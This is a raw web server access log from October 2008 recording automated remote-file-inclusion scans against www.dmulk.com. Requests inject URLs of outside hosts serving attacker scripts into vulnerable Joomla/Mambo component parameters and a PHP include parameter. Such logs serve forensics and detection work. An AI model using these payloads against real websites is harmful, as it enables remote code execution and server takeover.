161.58.192.164 - - [23/Oct/2008:09:12:19 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:12:19 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://vcd.co.uk//includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:12:33 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://business-buket.ru/mega.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:12:42 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:12:42 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [23/Oct/2008:09:12:42 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:12:43 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.181.129.178 - - [23/Oct/2008:09:12:45 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:12:49 -0700] "GET /logs/access_080326.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.stupidscifi.com/images/tv/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:24 -0700] "GET /logs/access_080530.log%20%20//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:25 -0700] "GET /logs/access_080603.log%20%20//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:25 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:25 -0700] "GET /logs/access_080606.log//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:25 -0700] "GET /logs/access_080530.log//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:25 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:25 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:25 -0700] "GET /logs//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 200 70452 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:25 -0700] "GET /logs//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 200 70452 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:25 -0700] "GET /logs/access_080606.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:25 -0700] "GET /logs/access_080530.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log%20%20//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:26 -0700] "GET /logs//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 200 70452 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080606.log%20%20//?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080606.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080606.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:26 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080606.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:26 -0700] "GET /logs/access_080530.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:27 -0700] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080606.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080530.log//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:27 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080606.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080530.log//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:27 -0700] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:27 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080606.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080530.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:28 -0700] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080606.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080530.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:28 -0700] "GET /logs//administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:28 -0700] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080606.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080530.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:28 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:29 -0700] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:29 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:29 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:29 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:29 -0700] "GET /logs/access_080606.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:29 -0700] "GET /logs/access_080530.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:29 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:29 -0700] "GET /logs/access_080603.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:13:29 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:29 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:29 -0700] "GET /logs/access_080530.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:13:29 -0700] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:13:29 -0700] "GET /logs/access_080606.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
